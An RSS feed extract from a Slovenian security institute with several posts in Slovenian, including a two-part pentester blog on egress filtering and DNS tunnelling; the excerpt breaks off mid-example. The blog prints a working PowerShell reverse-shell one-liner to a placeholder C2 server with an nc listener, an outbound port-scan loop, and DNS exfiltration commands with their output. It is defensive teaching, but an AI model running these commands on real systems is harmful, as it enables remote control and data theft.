										<content:encoded><![CDATA[<p><strong>V torek, 12. marca 2024, smo uspešno izvedli strokovno srečanje, katerega namen je bil skupaj z udeleženci spregovoriti:</strong></p>
<ul>
<li>kako dosegati pričakovanja in zahteve kupcev avtomobilske industrije,</li>
<li>kako zagotavljati visoko kakovostne izdelke, ki izpolnjujejo ali presegajo pričakovanja strank,</li>
<li>kako ravnati z informacijami občutljive narave, kako zagotavljati zahtevano raven varovanja informacij ter</li>
<li>kako ohranjati in nadgrajevati znanje ter kompetence zaposlenih, da bomo lahko izpolnjevali vsa ta pričakovanja in zahteve.</li>
</ul>
<p>V AVTOMOBILSKI INDUSTRIJI podjetja izmenjujejo ogromno INFORMACIJ OBČUTLJIVE NARAVE, ki  jih je treba ZAŠČITITI pred krajo, izgubo ali nepooblaščenim dostopom in spreminjanjem. INFORMACIJSKA VARNOST zato postaja eden ključnih DEJAVNIKOV KONKURENČNOSTI in celo že ODLOČILEN dejavnik pri odločanju kupcev za določenega dobavitelja.</p>
<p>Danes večina avtomobilskih proizvajalcev od dobaviteljev zahteva poznavanje, razumevanje in implementacijo zahtev izhodiščnega standarda za sistem upravljanja informacijske varnosti ISO/IEC 27001. Zato lahko le organizacije, ki imajo vpeljane ustrezne varnostne mehanizme in katerih zaposleni imajo ustrezna znanja in dokazljivo stopnjo kompetenc, svojim naročnikom zagotavljajo, da bodo njihove zahteve po kakovosti in informacijski varnosti izpolnjene.</p>
<p>Dogodek smo organizirali skupaj s SRIP ACS+, s katerim nas povezuje dolgoročno sodelovanje. Cilj tokratnega sodelovanja je povezovanje partnerjev SIQ in članov SRIP ACS+.</p>
<p>Gostje iz prakse so podali aktualne in v prakso prenosljive informacije.</p>
<p>Prvi gost strokovnega srečanja<strong> mag. Janez Bauer</strong> (vodilni presojevalec in predavatelj na SIQ) je poudaril pomen dviga ravni varovanja informacij in zaupanja v partnerski verigi avtomobilske industrije. V avtomobilski industriji, kjer podjetja izmenjujejo ogromno podatkov občutljive narave, ki jih je treba zaščititi pred krajo, izgubo ali spreminjanjem, je informacijska varnost odločilen dejavnik konkurenčnosti.</p>
<p>Srečanje je nadaljeval <a href="https://www.siq.si/izobrazevanje/predavatelji/predavatelj/?id=165"><strong>Anton Petrič</strong></a> (SIQ-predavatelj, strokovni vodja Šole kakovosti – Skrbnik sistema vodenja kakovosti in direktor direkcije za skupne zadeve v TPV Automotive d.o.o., ki je član SRIP ACS+).</p>
<p>TPV Automotive je nosilec različnih certifikatov za sisteme vodenja (IATF 16949, 9001, 14001, 45001). Je razvojni dobavitelj v avtomobilski industriji. V njihovih programih razvijajo in proizvajajo izdelke, ki pomembno vplivajo na vozno dinamiko, varnost, ekološkost in udobje pri vožnji.</p>
<p>Anton Petrič je na kratko orisal proces pristopa k implementiranju zahtev TISAX<strong>®</strong>. Poudaril je, da so k bolj sistematičnemu pristopu implementacije pripomogle izkušnje iz že uvedenih  sistemov vodenja ter predhodno že implementirane zahteve informacijske varnosti po ISO 27001, kar jim je služilo kot odlična opora za nadgradnjo sistema. Izpostavil je tudi, kako pomembni so podpora vodstva, razumevanje kompleksnosti implementacije zahtev v prakso ter ozaveščanje zaposlenih in pridobivanje ustreznih kompetenc oziroma strokovnih znanj.</p>
<p>Srečanje je zaključil Mišo Pavič (vodja IT službe v odelo Slovenija d.o.o.). Odelo je eden vodilnih proizvajalcev avtomobilskih svetlobnih teles z visokokakovostnimi izdelki, prvovrstno storitvijo in inovativnimi tehnologijami. Skupina odelo razvija in proizvaja sisteme zadnjih luči za avtomobilsko industrijo na desetih lokacijah po vsem svetu. Tudi odelo je nosilec različnih certifikatov za sisteme vodenja (IATF 16949, ISO 9001, 14001, 27001, 45001, 50001 in TISAX<strong>®</strong>). Mišo Pavič je predstavil, kako so se v njihovi praksi lotili izziva, ki jim ga je zastavil kupec. Poudaril je pomen uvedbe TISAX<strong>®</strong>-a v organizacijo, saj s tem dokazujejo, da je njihovo upravljanje informacijske varnosti skladno z opredeljeno ravnijo varnosti.</p>
<p>Vabljeni, da si ogledate <a href="https://youtu.be/G8vO7wa2xxE?si=F0Ex8Bbs6N8b1ePy">posnetek</a> strokovnega srečanja.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-30790 size-large" src="https://www.siq.si/wp-content/uploads/2024/03/izo_tisax-1024x550.png" alt="" width="1024" height="550" srcset="https://www.siq.si/wp-content/uploads/2024/03/izo_tisax-1024x550.png 1024w, https://www.siq.si/wp-content/uploads/2024/03/izo_tisax-300x161.png 300w, https://www.siq.si/wp-content/uploads/2024/03/izo_tisax-768x413.png 768w, https://www.siq.si/wp-content/uploads/2024/03/izo_tisax-1536x826.png 1536w, https://www.siq.si/wp-content/uploads/2024/03/izo_tisax.png 1920w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></p>
<p>The post <a href="https://www.siq.si/novice/izvedli-smo-e-strokovno-srecanje-zagotavljanje-zahtevane-informacijske-varnosti-v-avtomobilski-industriji-sistem-upravljanja-varovanja-informacij-po-zahtevah-nove-izdaje-tisax-vda-isa/">Izvedli smo e-strokovno srečanje: Zagotavljanje zahtevane informacijske varnosti v avtomobilski industriji – sistem upravljanja varovanja informacij po zahtevah nove izdaje TISAX® VDA ISA 6.0</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Vavčerji za kibernetsko varnost so ponovno na voljo</title>
		<link>https://www.siq.si/novice/vavcerji-za-kibernetsko-varnost-so-ponovno-na-voljo/</link>
		
		<dc:creator><![CDATA[Nina Erjavec]]></dc:creator>
		<pubDate>Mon, 11 Oct 2021 07:23:55 +0000</pubDate>
				<category><![CDATA[Informacijske tehnologije]]></category>
		<guid isPermaLink="false">https://www.siq.si/novice/</guid>

					<description><![CDATA[<p>Slovenski podjetniški sklad je ponovno objavil javni poziv za vavčerje s področja digitalizacije in s tem spodbudil mikro, mala in srednja podjetja k usmerjenemu obvladovanju kibernetskih tveganj. S sofinanciranjem ključnega področja digitalizacije, kibernetske varnosti, bo vaša organizacija povečala konkurenčnost in kompetence ter s tem povišala prihodke od prodaje. Na voljo je do 9.999,00 EUR nepovratnih [&#8230;]</p>
<p>The post <a href="https://www.siq.si/novice/vavcerji-za-kibernetsko-varnost-so-ponovno-na-voljo/">Vavčerji za kibernetsko varnost so ponovno na voljo</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><strong>Slovenski podjetniški sklad je ponovno objavil javni poziv za vavčerje s področja digitalizacije in s tem spodbudil mikro, mala in srednja podjetja k usmerjenemu obvladovanju kibernetskih tveganj.</strong></p>
<p>S sofinanciranjem ključnega področja digitalizacije, kibernetske varnosti, bo vaša organizacija povečala konkurenčnost in kompetence ter s tem povišala prihodke od prodaje. Na voljo je do 9.999,00 EUR nepovratnih sredstev za penetracijsko testiranje ter 5.000,00 EUR nepovratnih sredstev za sistemski varnostni pregled.</p>
<p><strong>Cilj varnostnih pregledov</strong> je identificirati področja, ki jih je s stališča varnosti informacijskih sistemov potrebno izboljšati. SIQ Ljubljana s svojo <a href="https://www.siq.si/nase-dejavnosti/informacijske-tehnologije/predstavitev/">ekipo izkušenih strokovnjakov s področja informacijske varnosti</a> izvaja celovit nabor varnostnih pregledov. <a href="mailto:branko.milicevic@siq.si">Kontaktirajte nas</a> in skupaj bomo našli najboljšo rešitev za vašo organizacijo.</p>
<p>Več informacij najdete tudi na <a href="https://dihslovenia.si/vavcerji/vavcer-za-kibernetsko-varnost">DIH Slovenija</a> ali <a href="https://podjetniskisklad.si/sl/razpisi?view=tender&amp;id=135">Slovenski podjetniški sklad</a>.</p>
<p><img loading="lazy" decoding="async" class="size-large wp-image-23907" src="https://www.siq.si/wp-content/uploads/2021/10/kibernetska-varnost-vavcerji-1-1024x576.jpg" alt="" width="1024" height="576" srcset="https://www.siq.si/wp-content/uploads/2021/10/kibernetska-varnost-vavcerji-1-1024x576.jpg 1024w, https://www.siq.si/wp-content/uploads/2021/10/kibernetska-varnost-vavcerji-1-300x169.jpg 300w, https://www.siq.si/wp-content/uploads/2021/10/kibernetska-varnost-vavcerji-1-768x432.jpg 768w, https://www.siq.si/wp-content/uploads/2021/10/kibernetska-varnost-vavcerji-1.jpg 1200w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></p>
<p>The post <a href="https://www.siq.si/novice/vavcerji-za-kibernetsko-varnost-so-ponovno-na-voljo/">Vavčerji za kibernetsko varnost so ponovno na voljo</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Veliki: koliko jim lahko zaupamo?</title>
		<link>https://www.siq.si/novice/19812/</link>
		
		<dc:creator><![CDATA[Iztok_Krebs]]></dc:creator>
		<pubDate>Fri, 02 Oct 2020 12:31:03 +0000</pubDate>
				<category><![CDATA[Informacijske tehnologije]]></category>
		<guid isPermaLink="false">https://www.siq.si/novice/</guid>

					<description><![CDATA[<p>Naši strokovnjaki s področja informacijske varnosti, so včeraj, na 18. zaporedni konferenci INFOSEK, izvedli odmevno predavanje z naslovom: &#8220;Veliki: koliko jim lahko zaupamo?&#8221;. Predstavili so zadnje odmevnejše kibernetske napade ter ranljivosti proizvajalcev programske opreme, trende sodobnih hekerskih tehnik in (ne) zaupanje v umetno inteligenco. Zahvaljujemo se vam, da ste bili ponovno z nami, v živo [&#8230;]</p>
<p>The post <a href="https://www.siq.si/novice/19812/">Veliki: koliko jim lahko zaupamo?</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Naši strokovnjaki s področja informacijske varnosti, so včeraj, na 18. zaporedni konferenci INFOSEK, izvedli odmevno predavanje z naslovom: &#8220;Veliki: koliko jim lahko zaupamo?&#8221;.<br />
Predstavili so zadnje odmevnejše kibernetske napade ter ranljivosti proizvajalcev programske opreme, trende sodobnih hekerskih tehnik in (ne) zaupanje v umetno inteligenco.</p>
<p>Zahvaljujemo se vam, da ste bili ponovno z nami, v živo in on-line.</p>
<p>SIQ Ekipa informacijske varnosti</p>
<div id="attachment_19811" style="width: 310px" class="wp-caption alignnone"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-19811" class="size-medium wp-image-19811" src="https://www.siq.si/wp-content/uploads/2020/10/Infosek_2020-300x200.jpg" alt="Infosek 2020" width="300" height="200" srcset="https://www.siq.si/wp-content/uploads/2020/10/Infosek_2020-300x200.jpg 300w, https://www.siq.si/wp-content/uploads/2020/10/Infosek_2020-1024x683.jpg 1024w, https://www.siq.si/wp-content/uploads/2020/10/Infosek_2020-768x513.jpg 768w, https://www.siq.si/wp-content/uploads/2020/10/Infosek_2020-1536x1025.jpg 1536w, https://www.siq.si/wp-content/uploads/2020/10/Infosek_2020-2048x1367.jpg 2048w" sizes="auto, (max-width: 300px) 100vw, 300px" /><p id="caption-attachment-19811" class="wp-caption-text">Infosek 2020</p></div>
<p>The post <a href="https://www.siq.si/novice/19812/">Veliki: koliko jim lahko zaupamo?</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Tudi hekerji nosijo (zaščitne) maske, 2. del</title>
		<link>https://www.siq.si/novice/tudi-hekerji-nosijo-zascitne-maske-2-del/</link>
		
		<dc:creator><![CDATA[Nina Erjavec]]></dc:creator>
		<pubDate>Tue, 05 May 2020 06:11:28 +0000</pubDate>
				<category><![CDATA[Informacijske tehnologije]]></category>
		<guid isPermaLink="false">https://www.siq.si/novice/</guid>

					<description><![CDATA[<p>V prvem delu iz serije blogov smo se dotaknili dveh temeljnih ciljev kibernetskih napadalcev; to sta oddaljeni prevzem (sistema) žrtve ter tamkajšnje prikrito ohranjane dostopa iz napadalčevega C2 komandnega strežnika. Iz prve roke lahko povemo, da vzpostavitev vzvratnega komunikacijskega kanala do notranjih virov ciljne organizacije ni vedno trivialna. Skrajni manever, ki ga pentesterji na terenu [&#8230;]</p>
<p>The post <a href="https://www.siq.si/novice/tudi-hekerji-nosijo-zascitne-maske-2-del/">Tudi hekerji nosijo (zaščitne) maske, 2. del</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>V <a href="https://www.siq.si/novice/tudi-hekerji-nosijo-zascitne-maske-1-del/">prvem delu</a> iz serije blogov smo se dotaknili dveh temeljnih ciljev kibernetskih napadalcev; to sta oddaljeni prevzem (sistema) žrtve ter tamkajšnje prikrito ohranjane dostopa iz napadalčevega C2 komandnega strežnika. Iz prve roke lahko povemo, da vzpostavitev vzvratnega komunikacijskega kanala do notranjih virov ciljne organizacije ni vedno trivialna. Skrajni manever, ki ga pentesterji na terenu v enako skrajnih situacijah uporabimo, je vzvratno tuneliranje prek uveljavljenega protokola DNS (Domain Name Service). Tehniko, ki pa (žal) ni poznana le izurjenim »etičnim« hekerjem, bomo prikazali v nadaljevanju.</p>
<p>Omenili smo že, da v praksi naletimo tudi na zgledno varnostno utrjene sisteme, ki ne dovoljujejo poljubne komunikacije z zunanjimi, zaupanja nevrednimi viri. V najboljšem primeru izvajalec varnostnega preizkusa, v najbolj črnih scenarijih pa heker ali vnesena škodljiva koda, skušajo potemtakem svojo priložnost iskati v legitimnih komunikacijskih poteh (npr. HTTP(S), RDP, SMTP ipd.).</p>
<p>Z modernejšimi varnostnimi pristopi je mogoče zakrivanje poskusov t.i. tuneliranja relativno enostavno zaznati in ustrezno preprečiti že na omrežni ravni. Enako velja tudi za protokolno ter aplikativno inspekcijo protokola DNS, kjer pa se ta pogosto – enako smo nanjo namerno pozabili v predhodnem blogu – znajde na stranskem tiru. Za nazornejši prikaz problematike podajamo atraktiven opis orodja, sicer prosto dostopnega na svetovnem spletu, ki omogoča prikrito upravljane oddaljenega sistema oz. eksfiltriranje podatkov iz njega.</p>
<table>
<tbody>
<tr>
<td width="604"><span style="color: #003366;"><em>The shell uses legitimate DNS requests and responses to encode commands and exfiltrated data, making the traffic look like just a bunch of funky DNS requests on the wire. </em></span></td>
</tr>
</tbody>
</table>
<p>Najprej pa se vrnimo k osnovam. Podporna storitev DNS velja v internetnem svetu za nepogrešljivo in jo v razlagah radi primerjamo s tradicionalnim telefonskim imenikom. Omogoča namreč razreševanje spletnih naslovov (npr. naprav ali storitev) v njihove dejanske internetne naslove, ki jih povezani informacijsko-komunikacijski sistemi uporabljajo za medsebojno sporazumevanje. Ugotavljamo, da je prav razširjenost koncepta DNS najverjetnejši razlog za ustvarjeno zaupanje vanj ter njegovo šibko obvladovanje z vidika kibernetske varnosti. Izhodiščno ugotovitev želimo na tem mestu še nadgraditi; menimo, da je analiza DNS povpraševanj v tipičnih organizacijah vse prej kot izkoriščen potencial.</p>
<p>Navajamo tri bistvene argumente za neprekinjeno spremljanje prometa DNS:</p>
<ul>
<li>Razširitev varnostne vidljivosti znotraj organizacije na poljuben tip komunikacije, ki za razreševanje izvorov in ciljev uporablja DNS (npr. HTTP(S), RDP, SSH oz. poljuben poskus odhodne povezave iz okužene naprave).</li>
<li>DNS razreševanje uporablja tudi napredna škodljiva koda (npr. DGA – Domain Generation Algorithm).</li>
<li>Integracija hibridnih varnostnih rešitev z namenskimi rešitvami za prepoznavanje domen s slabim ugledom (strok. Threat Intelligence).</li>
</ul>
<p>Dobra novica za hekerja, tako etičnega kot zlonamernega, je praviloma dovoljena uporaba koncepta DNS tudi v najbolj zaprtih informacijskih okoljih. Prav slednje je zadosten vzvod za njegovo zlorabo v okoliščinah, ko oddaljeno upravljanje prek drugih (bolj intuitivnih) poti ni dovoljeno. Izkaže se, da velja za dovolj ohlapno že na pogled konservativnejša robna varnostna politika, ki dovoljuje navzgornjo komunikacijo izključno prek vrat UDP/53, z zgolj zaupanja vrednim primarnim strežnikom DNS. Še več, hierarhična zasnova koncepta DNS omogoča zanesljivo interakcijo med (ne)nadzorovano škodljivo kodo (v notranjem omrežju organizacije) in C2 komandnim strežnikom napadalca, četudi neposredna povezljivost z žrtvijo napada ne obstaja, ni dovoljena oz. je ta eksplicitno prepovedana z robno varnostno politiko (npr. požarne pregrade). Posebnost nazorneje prikažimo na primeru:</p>
<p><img loading="lazy" decoding="async" class="alignnone size-large wp-image-18005" src="https://www.siq.si/wp-content/uploads/2020/05/Slika-1-1024x370.png" alt="" width="1024" height="370" srcset="https://www.siq.si/wp-content/uploads/2020/05/Slika-1-1024x370.png 1024w, https://www.siq.si/wp-content/uploads/2020/05/Slika-1-300x108.png 300w, https://www.siq.si/wp-content/uploads/2020/05/Slika-1-768x278.png 768w, https://www.siq.si/wp-content/uploads/2020/05/Slika-1.png 1536w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></p>
<p>Napadalec mora za izvedbo takšnega napada registrirati domeno (zadošča enkraten strošek 2$), katere avtoritativni DNS strežnik obrne na C2 komandni strežnik v njegovi posesti. Na slednjem namesti zlonamerno orodje, katerega poslanstvo ni streženje legitimnih DNS odgovorov temveč interakcija z (ne)nadzorovano kodo na strani žrtve.</p>
<p>Z namenom prikaza tehnike smo registrirali domeno siq.best in uredili zapise po meri:</p>
<table>
<tbody>
<tr>
<td width="604"><em><span style="color: #003366;"><strong>REGISTRACIJA DOMENE:</strong></span></em><br />
<em><span style="color: #003366;">whois <strong>siq.best</strong> | grep name</span></em><br />
<em><span style="color: #003366;">Domain Name: SIQ.BEST</span></em><br />
<em><span style="color: #003366;">Name Server: <strong>C2_SERVER_FQDN</strong></span></em><br />
<em><span style="color: #003366;">Name Server: NS4.MOJHOST.SI</span></em></td>
</tr>
</tbody>
</table>
<p>V nadaljevanju podajamo strnjen prikaz eksfiltracije občutljive datoteke z uporabo opisane tehnike:</p>
<table style="height: 612px;" width="706">
<tbody>
<tr>
<td width="604"><span style="color: #003366;"><strong><em>ŽRTEV [SIQ\mmesojednik]</em></strong></span><br />
<span style="color: #003366;"><em>PS C:\Tools\DNSExFil&gt;  Invoke-DNSExfiltrator -i C:\POMEMBNO\<strong>pogodba.txt</strong> -d </em></span><br />
<span style="color: #003366;"><em><strong>siq.best</strong> -p password</em></span><br />
<span style="color: #003366;"><em>[*] Compressing (ZIP) the [pogodba.txt] file in memory</em></span><br />
<span style="color: #003366;"><em>[*] Encrypting the ZIP file with password [password]</em></span><br />
<span style="color: #003366;"><em>[*] Encoding the data with Base64URL</em></span><br />
<span style="color: #003366;"><em>…</em></span><br />
<span style="color: #003366;"><em>[*] Sending data&#8230;</em></span><br />
<span style="color: #003366;"><em>[*] DONE !</em></span></p>
<p style="margin-bottom: 0px !important;"><span style="color: #003366;"><strong><em>NAPADALEC [C2 server | Avtoritativni strežnik DNS]</em></strong></span><br />
<span style="color: #003366;"><em>#python dnsexfiltrator.py -d <strong>siq.best</strong> -p password</em></span><br />
<span style="color: #003366;"><em>[*] DNS server listening on port 53</em></span><br />
<span style="color: #003366;"><em>[+] Data was encoded using Base64URL</em></span><br />
<span style="color: #003366;"><em>…</em></span><br />
<span style="color: #003366;"><em>[+] Receiving file [pogodba.txt] as a ZIP file in [1] chunks</em></span><br />
<span style="color: #003366;"><em>[============================================================] 100.0%</em></span><br />
<span style="color: #003366;"><em>…</em></span><br />
<span style="color: #003366;"><em>[+] Decrypting using password [password] and saving to output file </em></span><br />
<span style="color: #003366;"><em>[pogodba.txt.zip]</em></span><br />
<em><span style="color: #003366;">[+] Output file [pogodba.txt.zip]</span> <span style="color: #ff0000;"><strong>saved successfully</strong></span></em><br />
<span style="color: #003366;"><strong><em>…</em></strong></span><br />
<span style="color: #003366;"><em># zcat pogodba.txt.zip</em></span><br />
<span style="color: #ff0000;"><strong><em>STROGO ZAUPNO!!!</em></strong></span></p>
</td>
</tr>
</tbody>
</table>
<p>Posebnost tehnike, ki jo naredi še toliko bolj prepričljivo ter učinkovito, je zakrivanje identitete (naslov IP ali FQDN) C2 komandnega strežnika skozi celoten potek eksfiltracije. Opazite, da je v zgornjem ukazu podano le ime domene, ne pa tudi naslov strežnika?</p>
<p>Kot je razvidno iz zajema prometa (uporaba orodja Wireshark) na strani simulirane žrtve, ta neposredno komunicira le s primarnim, zaupanja vrednim strežnikom DNS. Internetni naslov C2 komandnega strežnika, ki ima hkrati vlogo avtoritativnega strežnika DNS za napadalčevo domeno siq.best, v zajeti komunikaciji ne nastopa. Slednje korenito oteži zaznavo in preprečitev takšnega napada.</p>
<p><img loading="lazy" decoding="async" class="alignnone size-large wp-image-18006" src="https://www.siq.si/wp-content/uploads/2020/05/slika-2-1024x125.png" alt="" width="1024" height="125" srcset="https://www.siq.si/wp-content/uploads/2020/05/slika-2-1024x125.png 1024w, https://www.siq.si/wp-content/uploads/2020/05/slika-2-300x37.png 300w, https://www.siq.si/wp-content/uploads/2020/05/slika-2-768x94.png 768w, https://www.siq.si/wp-content/uploads/2020/05/slika-2.png 1306w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></p>
<p>Iz posnetega prometa je razvidna dejanska interakcija in ustvarjen šum v procesu eksfiltracije občutljive datoteke. Indikatorje prevzema (strok. Indicator of Compromise) oz. odstopanja od legitimnega DNS povpraševanja gre očitno iskati drugod, kot npr. v visoki entropiji iskanih pod-domen krovne domene siq.best, v intenziteti povpraševanja iz enega samega izvora, v ustvarjeni količini DNS prometa ipd.</p>
<p>Na tem mestu se ustavimo in povabimo k deljenju svojih izkušenj tudi vas, bralce. Ter nenazadnje tudi specializirane »blue-teame«, varnostno operativne centre (Security Operations Center &#8211; SOC) in pristojne informatike, ki na drugi strani opisane tehnike neprekinjeno zaznavate in preprečujete. Stay tuned …</p>
<p>The post <a href="https://www.siq.si/novice/tudi-hekerji-nosijo-zascitne-maske-2-del/">Tudi hekerji nosijo (zaščitne) maske, 2. del</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Tudi hekerji nosijo (zaščitne) maske, 1. del</title>
		<link>https://www.siq.si/novice/tudi-hekerji-nosijo-zascitne-maske-1-del/</link>
		
		<dc:creator><![CDATA[Nina Erjavec]]></dc:creator>
		<pubDate>Fri, 24 Apr 2020 07:51:05 +0000</pubDate>
				<category><![CDATA[Informacijske tehnologije]]></category>
		<guid isPermaLink="false">https://www.siq.si/novice/</guid>

					<description><![CDATA[<p>Odtekanje, odtujevanje ali uhajanje občutljivih podatkov predstavlja hujšo varnostno kršitev oz. obliko kibernetskega kriminala. Zato ni nenavadno, da stroka eksfiltracijo podatkov obravnava kot enega bolj reprezentativnih ciljev motiviranih kibernetskih napadalcev [MITRE ATT&#38;CK], [CYBER KILL-CHAIN]. V seriji prispevkov – v vlogi neodvisnega preizkuševalca informacijskih tehnologij – izpostavljamo značilne pomanjkljivosti v zasnovah informacijskih sistemov, ki (pre)pogosto ne [&#8230;]</p>
<p>The post <a href="https://www.siq.si/novice/tudi-hekerji-nosijo-zascitne-maske-1-del/">Tudi hekerji nosijo (zaščitne) maske, 1. del</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Odtekanje, odtujevanje ali uhajanje občutljivih podatkov predstavlja hujšo varnostno kršitev oz. obliko kibernetskega kriminala. Zato ni nenavadno, da stroka eksfiltracijo podatkov obravnava kot enega bolj reprezentativnih ciljev motiviranih kibernetskih napadalcev [MITRE ATT&amp;CK], [CYBER KILL-CHAIN].</p>
<p>V seriji prispevkov – v vlogi neodvisnega preizkuševalca informacijskih tehnologij – izpostavljamo značilne pomanjkljivosti v zasnovah informacijskih sistemov, ki (pre)pogosto ne zagotavljajo zadostnih zmogljivosti zaznavanja in preprečevanja tovrstnih napadov. V prvem delu bralcu približamo problematiko šibkega omejevanja odhodnih komunikacij v tipičnih informacijskih sistemih organizacij. V osrednjem delu opisujemo naprednejšo zlonamerno tehniko, ki temelji na zlorabi povsem legitimnega in uveljavljenega protokola DNS (Domain Name Service), omogoča pa popoln prevzem zlorabljenega sistema oz. odtekanje na njem hranjenih podatkov. V sklepnem delu podajamo priporočila za utrditev obstoječih varnostnih mehanizmov, da ti minimizirajo učinek uveljavljenih hekerskih tehnik.</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-17961" src="https://www.siq.si/wp-content/uploads/2020/04/mika-baumeister-J5yoGZLdpSI-unsplash-web.jpg" alt="IT security" width="600" height="401" srcset="https://www.siq.si/wp-content/uploads/2020/04/mika-baumeister-J5yoGZLdpSI-unsplash-web.jpg 600w, https://www.siq.si/wp-content/uploads/2020/04/mika-baumeister-J5yoGZLdpSI-unsplash-web-300x201.jpg 300w" sizes="auto, (max-width: 600px) 100vw, 600px" /></p>
<p>Enostaven test, ki ga v informacijskem sistemu naročnika storitve (npr. pentest, red teaming) sistematično izvedemo že v sklopu spoznavanja okolja (strok. reconnaissance), je preizkus omejevanja odhodne (angl. egress) spletne komunikacije. Ta poteka v smeri od uporabnika, npr. zaposlenega v podjetju ali delavca, ki svoje delo opravlja od doma, proti internetu. V spodnjem zgledu smo uporabili ukazno lupino Powershell. Orodje je privzeto podprto v vseh modernejših različicah operacijskega sistema MS Windows in je kot takšno (lahko) dostopno ne le uporabnikom temveč tudi uspešnemu napadalcu ali injicirani škodljivi kodi:</p>
<table>
<tbody>
<tr>
<td width="614"><span style="color: #003366;"><em>1.. 65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(&#8220;C2_IP&#8221;,$_)) &#8220;Port $_ is open!&#8221;} 2&gt;$null</em></span></td>
</tr>
</tbody>
</table>
<p>Z enostavnim eno-vrstičnim ukazom preverimo nabor odprtih komunikacijskih poti v smeri od uporabnika proti spletu. Nekdo bi se vprašal o pravem pomenu ali smiselnosti izvedbe takšnega testa. Napadalci se vendar nahajajo zunaj varovanih informacijskih okolij, zato bi tudi njihove poskuse pričakovali uperjene v obratni smeri. Številne neodvisne študije in specialisti na področju informacijske varnosti na drugi strani opozarjamo na prevladujoč delež kibernetskih napadov z notranjim izvorom. Tipični komponenti takšnega napada sta:</p>
<p>[1] ohranjanje dostopa (strok. persistency) in<br />
[2] zmožnost nadaljnjega upravljanja (strok. Command and Control – C2) prevzetega sistema.</p>
<p>Tehnika C2 [2] temelji na vzpostavitvi vzvratne komunikacijske poti med žrtvijo ter napadalčevim nadzornim strežnikom in je običajno posledica zagona škodljive kode (npr. uporabnika, ki klikne na škodljivo priponko) oz. izrabe kritične ranljivosti orodja ali aplikacije na kompromitiranem sistemu. Zlonamerna vzvratna povezava je vzpostavljena v smeri od uporabnika proti internetu, kar dodatno oteži njeno prepoznavo in zajezitev v (vsaj) na videz legitimni spletni komunikaciji med notranjimi uporabniki in svetovnim spletom. Upoštevaje prevladujočo ugotovitev varnostnih pregledov, da so odhodne varnostne politike robnih varnostnih naprav bistveno ohlapnejše od dohodnih, je tudi uspešnost C2 povezave do napadalčevega nadzornega strežnika verjetnejša.</p>
<p><img loading="lazy" decoding="async" class="alignnone size-large wp-image-17959" src="https://www.siq.si/wp-content/uploads/2020/04/blog-1-1024x283.png" alt="" width="1024" height="283" srcset="https://www.siq.si/wp-content/uploads/2020/04/blog-1-1024x283.png 1024w, https://www.siq.si/wp-content/uploads/2020/04/blog-1-300x83.png 300w, https://www.siq.si/wp-content/uploads/2020/04/blog-1-768x212.png 768w, https://www.siq.si/wp-content/uploads/2020/04/blog-1.png 1268w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></p>
<p>Vprašajmo se na tem mestu, katere odhodne komunikacijske poti so na robnih varnostnih sistemih organizacij običajno dovoljene. Pentesterji se na terenu prej izjemoma kot praviloma srečujemo z varnostno utrjenimi konfiguracijami, kjer je nabor dovoljenih komunikacij zaposlenih selektivno omejen na izključno spletno (npr. HTTP/HTTPS) in poštno storitev (npr. IPAM, MAPI, SMTP). Slednji veljata za najbolj ustaljeni obliki sporočanja in izmenjave informacij v poslovnih subjektih, zato je njun obstoj praktično nujen.</p>
<p>Pa je omejevanje komunikacijskih poti (na izključno spletne in poštne) že zadostno tudi z vidika učinkovite kibernetske obrambe? Izkaže se, da utečeni komunikacijski kanali, posebej kadar so ti dodatno še šifrirani (npr. HTTPS, IMAPS), nudijo idealen poligon tudi za zakrivanje zlonamernih aktivnosti vse spretnejših kibernetskih napadalcev. Opažamo tudi drug ekstrem, ko nazivno šifrirani protokoli (npr. HTTPS), zavestno in prav zaradi vprašljivega učinka inspekcije niso predmet poglobljene analize na namenskih varnostnih napravah. Menimo, da povsem neupravičeno, kar si lahko zopet ogledamo na primeru. Vključena protokolna in aplikativna inspekcija na transportnih vratih TCP/80 bi nedvo(u)mno morala prepoznati spodnji »glasen« poskus vzpostavitve vzvratne ukazne lupine.</p>
<table style="height: 273px;" width="963">
<tbody>
<tr>
<td style="padding-top: 0px !important;" width="614">
<p style="margin-bottom: 0px !important;"><span style="color: #003366;"><strong>ŽRTEV [SIQ\mmesojednik]:</strong></span><br />
<span style="color: #003366;"><em>$client = New-Object System.Net.Sockets.TCPClient(&#8220;C2_server&#8221;,80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );<br />
</em><em>$sendback2 = $sendback + &#8220;PS &#8221; + (pwd).Path + &#8220;&gt; &#8220;;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};<br />
$client.Close()</em></span></p>
<p style="margin-bottom: 0px !important;"><span style="color: #003366;"><strong><br />
NAPADALEC [C2 SERVER]:</strong></span><br />
<span style="color: #003366;"><em>#nc -nlvp 80</em></span><br />
<span style="color: #003366;"><em>Ncat: Listening on :::80</em></span><br />
